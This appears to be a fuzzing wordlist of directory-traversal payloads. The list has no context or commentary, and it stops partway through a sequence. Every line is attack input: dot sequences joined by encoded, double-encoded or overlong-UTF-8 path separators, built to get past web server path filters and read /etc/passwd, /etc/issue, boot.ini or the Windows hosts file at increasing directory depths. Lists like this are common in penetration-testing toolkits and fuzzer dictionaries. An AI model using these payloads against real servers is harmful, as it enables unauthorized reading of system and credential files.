-.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%af.../.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259cboot.ini -.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c1%259c.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259c.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259c.../.%25c1%259cboot.ini -.../.%25c1%259c.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cboot.ini -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cboot.ini -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cboot.ini -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cpasswd -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cetc%25c1%259cissue -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cboot.ini -.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259c.../.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25afboot.ini -.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%25c0%25af.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25af.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25af.../.%25c0%25afboot.ini -.../.%25c0%25af.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afboot.ini -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afboot.ini -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afboot.ini -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afpasswd -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afetc%25c0%25afissue -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afboot.ini -.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25af.../.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%afboot.ini -.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%af.../.%f0%80%80%afboot.ini -.../.%f0%80%80%af.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afboot.ini -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afboot.ini -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afboot.ini -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afpasswd -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afetc%f0%80%80%afissue -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afboot.ini -.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%af.../.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%af.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%af.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afetc%f8%80%80%80%afissue -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afboot.ini -.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%af.../.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -....//etc//passwd -....//etc//issue -....//boot.ini -....//windows//system32//drivers//etc//hosts -....//....//etc//passwd -....//....//etc//issue -....//....//boot.ini -....//....//windows//system32//drivers//etc//hosts -....//....//....//etc//passwd -....//....//....//etc//issue -....//....//....//boot.ini -....//....//....//windows//system32//drivers//etc//hosts -....//....//....//....//etc//passwd -....//....//....//....//etc//issue -....//....//....//....//boot.ini -....//....//....//....//windows//system32//drivers//etc//hosts -....//....//....//....//....//etc//passwd -....//....//....//....//....//etc//issue -....//....//....//....//....//boot.ini -....//....//....//....//....//windows//system32//drivers//etc//hosts -....//....//....//....//....//....//etc//passwd -....//....//....//....//....//....//etc//issue -....//....//....//....//....//....//boot.ini -....//....//....//....//....//....//windows//system32//drivers//etc//hosts -..../\etc/\passwd -..../\etc/\issue -..../\boot.ini -..../\windows/\system32/\drivers/\etc/\hosts -..../\..../\etc/\passwd -..../\..../\etc/\issue -..../\..../\boot.ini -..../\..../\windows/\system32/\drivers/\etc/\hosts -..../\..../\..../\etc/\passwd -..../\..../\..../\etc/\issue -..../\..../\..../\boot.ini -..../\..../\..../\windows/\system32/\drivers/\etc/\hosts -..../\..../\..../\..../\etc/\passwd -..../\..../\..../\..../\etc/\issue -..../\..../\..../\..../\boot.ini -..../\..../\..../\..../\windows/\system32/\drivers/\etc/\hosts -..../\..../\..../\..../\..../\etc/\passwd -..../\..../\..../\..../\..../\etc/\issue -..../\..../\..../\..../\..../\boot.ini -..../\..../\..../\..../\..../\windows/\system32/\drivers/\etc/\hosts -..../\..../\..../\..../\..../\..../\etc/\passwd -..../\..../\..../\..../\..../\..../\etc/\issue -..../\..../\..../\..../\..../\..../\boot.ini -..../\..../\..../\..../\..../\..../\windows/\system32/\drivers/\etc/\hosts -..../%2fetc%2fpasswd -..../%2fetc%2fissue -..../%2fboot.ini -..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%2f..../%2fetc%2fpasswd -..../%2f..../%2fetc%2fissue -..../%2f..../%2fboot.ini -..../%2f..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%2f..../%2f..../%2fetc%2fpasswd -..../%2f..../%2f..../%2fetc%2fissue -..../%2f..../%2f..../%2fboot.ini -..../%2f..../%2f..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%2f..../%2f..../%2f..../%2fetc%2fpasswd -..../%2f..../%2f..../%2f..../%2fetc%2fissue -..../%2f..../%2f..../%2f..../%2fboot.ini -..../%2f..../%2f..../%2f..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%2f..../%2f..../%2f..../%2f..../%2fetc%2fpasswd -..../%2f..../%2f..../%2f..../%2f..../%2fetc%2fissue -..../%2f..../%2f..../%2f..../%2f..../%2fboot.ini -..../%2f..../%2f..../%2f..../%2f..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%2f..../%2f..../%2f..../%2f..../%2f..../%2fetc%2fpasswd -..../%2f..../%2f..../%2f..../%2f..../%2f..../%2fetc%2fissue -..../%2f..../%2f..../%2f..../%2f..../%2f..../%2fboot.ini -..../%2f..../%2f..../%2f..../%2f..../%2f..../%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -..../%5cetc%5cpasswd -..../%5cetc%5cissue -..../%5cboot.ini -..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../%5c..../%5cetc%5cpasswd -..../%5c..../%5cetc%5cissue -..../%5c..../%5cboot.ini -..../%5c..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../%5c..../%5c..../%5cetc%5cpasswd -..../%5c..../%5c..../%5cetc%5cissue -..../%5c..../%5c..../%5cboot.ini -..../%5c..../%5c..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../%5c..../%5c..../%5c..../%5cetc%5cpasswd -..../%5c..../%5c..../%5c..../%5cetc%5cissue -..../%5c..../%5c..../%5c..../%5cboot.ini -..../%5c..../%5c..../%5c..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../%5c..../%5c..../%5c..../%5c..../%5cetc%5cpasswd -..../%5c..../%5c..../%5c..../%5c..../%5cetc%5cissue -..../%5c..../%5c..../%5c..../%5c..../%5cboot.ini -..../%5c..../%5c..../%5c..../%5c..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../%5c..../%5c..../%5c..../%5c..../%5c..../%5cetc%5cpasswd -..../%5c..../%5c..../%5c..../%5c..../%5c..../%5cetc%5cissue -..../%5c..../%5c..../%5c..../%5c..../%5c..../%5cboot.ini -..../%5c..../%5c..../%5c..../%5c..../%5c..../%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -..../0x2fetc0x2fpasswd -..../0x2fetc0x2fissue -..../0x2fboot.ini -..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x2f..../0x2fetc0x2fpasswd -..../0x2f..../0x2fetc0x2fissue -..../0x2f..../0x2fboot.ini -..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x2f..../0x2f..../0x2fetc0x2fpasswd -..../0x2f..../0x2f..../0x2fetc0x2fissue -..../0x2f..../0x2f..../0x2fboot.ini -..../0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fpasswd -..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fissue -..../0x2f..../0x2f..../0x2f..../0x2fboot.ini -..../0x2f..../0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fpasswd -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fissue -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fboot.ini -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fpasswd -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fetc0x2fissue -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fboot.ini -..../0x2f..../0x2f..../0x2f..../0x2f..../0x2f..../0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -..../0x5cetc0x5cpasswd -..../0x5cetc0x5cissue -..../0x5cboot.ini -..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../0x5c..../0x5cetc0x5cpasswd -..../0x5c..../0x5cetc0x5cissue -..../0x5c..../0x5cboot.ini -..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../0x5c..../0x5c..../0x5cetc0x5cpasswd -..../0x5c..../0x5c..../0x5cetc0x5cissue -..../0x5c..../0x5c..../0x5cboot.ini -..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cpasswd -..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cissue -..../0x5c..../0x5c..../0x5c..../0x5cboot.ini -..../0x5c..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cpasswd -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cissue -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cboot.ini -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cpasswd -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cetc0x5cissue -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cboot.ini -..../0x5c..../0x5c..../0x5c..../0x5c..../0x5c..../0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -..../%252fetc%252fpasswd -..../%252fetc%252fissue -..../%252fboot.ini -..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%252f..../%252fetc%252fpasswd -..../%252f..../%252fetc%252fissue -..../%252f..../%252fboot.ini -..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%252f..../%252f..../%252fetc%252fpasswd -..../%252f..../%252f..../%252fetc%252fissue -..../%252f..../%252f..../%252fboot.ini -..../%252f..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%252f..../%252f..../%252f..../%252fetc%252fpasswd -..../%252f..../%252f..../%252f..../%252fetc%252fissue -..../%252f..../%252f..../%252f..../%252fboot.ini -..../%252f..../%252f..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%252f..../%252f..../%252f..../%252f..../%252fetc%252fpasswd -..../%252f..../%252f..../%252f..../%252f..../%252fetc%252fissue -..../%252f..../%252f..../%252f..../%252f..../%252fboot.ini -..../%252f..../%252f..../%252f..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%252f..../%252f..../%252f..../%252f..../%252f..../%252fetc%252fpasswd -..../%252f..../%252f..../%252f..../%252f..../%252f..../%252fetc%252fissue -..../%252f..../%252f..../%252f..../%252f..../%252f..../%252fboot.ini -..../%252f..../%252f..../%252f..../%252f..../%252f..../%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -..../%255cetc%255cpasswd -..../%255cetc%255cissue -..../%255cboot.ini -..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%255c..../%255cetc%255cpasswd -..../%255c..../%255cetc%255cissue -..../%255c..../%255cboot.ini -..../%255c..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%255c..../%255c..../%255cetc%255cpasswd -..../%255c..../%255c..../%255cetc%255cissue -..../%255c..../%255c..../%255cboot.ini -..../%255c..../%255c..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%255c..../%255c..../%255c..../%255cetc%255cpasswd -..../%255c..../%255c..../%255c..../%255cetc%255cissue -..../%255c..../%255c..../%255c..../%255cboot.ini -..../%255c..../%255c..../%255c..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%255c..../%255c..../%255c..../%255c..../%255cetc%255cpasswd -..../%255c..../%255c..../%255c..../%255c..../%255cetc%255cissue -..../%255c..../%255c..../%255c..../%255c..../%255cboot.ini -..../%255c..../%255c..../%255c..../%255c..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%255c..../%255c..../%255c..../%255c..../%255c..../%255cetc%255cpasswd -..../%255c..../%255c..../%255c..../%255c..../%255c..../%255cetc%255cissue -..../%255c..../%255c..../%255c..../%255c..../%255c..../%255cboot.ini -..../%255c..../%255c..../%255c..../%255c..../%255c..../%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -..../%c0%2fetc%c0%2fpasswd -..../%c0%2fetc%c0%2fissue -..../%c0%2fboot.ini -..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%2f..../%c0%2fetc%c0%2fpasswd -..../%c0%2f..../%c0%2fetc%c0%2fissue -..../%c0%2f..../%c0%2fboot.ini -..../%c0%2f..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fpasswd -..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fissue -..../%c0%2f..../%c0%2f..../%c0%2fboot.ini -..../%c0%2f..../%c0%2f..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fpasswd -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fissue -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fboot.ini -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fpasswd -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fissue -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fboot.ini -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fpasswd -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fetc%c0%2fissue -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fboot.ini -..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2f..../%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -..../%c0%afetc%c0%afpasswd -..../%c0%afetc%c0%afissue -..../%c0%afboot.ini -..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%af..../%c0%afetc%c0%afpasswd -..../%c0%af..../%c0%afetc%c0%afissue -..../%c0%af..../%c0%afboot.ini -..../%c0%af..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%af..../%c0%af..../%c0%afetc%c0%afpasswd -..../%c0%af..../%c0%af..../%c0%afetc%c0%afissue -..../%c0%af..../%c0%af..../%c0%afboot.ini -..../%c0%af..../%c0%af..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afpasswd -..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afissue -..../%c0%af..../%c0%af..../%c0%af..../%c0%afboot.ini -..../%c0%af..../%c0%af..../%c0%af..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afpasswd -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afissue -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afboot.ini -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afpasswd -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afetc%c0%afissue -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afboot.ini -..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%af..../%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -..../%c0%5cetc%c0%5cpasswd -..../%c0%5cetc%c0%5cissue -..../%c0%5cboot.ini -..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c0%5c..../%c0%5cetc%c0%5cpasswd -..../%c0%5c..../%c0%5cetc%c0%5cissue -..../%c0%5c..../%c0%5cboot.ini -..../%c0%5c..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cpasswd -..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cissue -..../%c0%5c..../%c0%5c..../%c0%5cboot.ini -..../%c0%5c..../%c0%5c..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cpasswd -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cissue -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cboot.ini -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cpasswd -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cissue -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cboot.ini -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cpasswd -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cetc%c0%5cissue -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cboot.ini -..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5c..../%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -..../%c1%9cetc%c1%9cpasswd -..../%c1%9cetc%c1%9cissue -..../%c1%9cboot.ini -..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%9c..../%c1%9cetc%c1%9cpasswd -..../%c1%9c..../%c1%9cetc%c1%9cissue -..../%c1%9c..../%c1%9cboot.ini -..../%c1%9c..../%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cpasswd -..../%c1%9c..../%c1%9c..../%c1%9cetc%c1%9cissue 